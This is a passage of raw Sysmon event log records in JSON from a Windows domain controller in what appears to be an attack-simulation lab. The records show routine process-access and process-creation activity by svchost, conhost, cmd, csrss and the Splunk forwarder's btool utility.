07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-0010A1390500}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A1390500}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.886\r\nProcessGuid: {41C8662E-1FEF-5F25-0000-00106A3A0500}\r\nProcessId: 3268\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-0010A1390500}\r\nParentProcessId: 2732\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.886","ProcessGuid":"{41C8662E-1FEF-5F25-0000-00106A3A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-0010A1390500}","ParentProcessId":"2732","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-0010A1390500}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2268\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00106A3A0500}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A1390500}","SourceProcessId":"2732","SourceThreadId":"2268","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00106A3A0500}","TargetProcessId":"3268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00106A3A0500}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 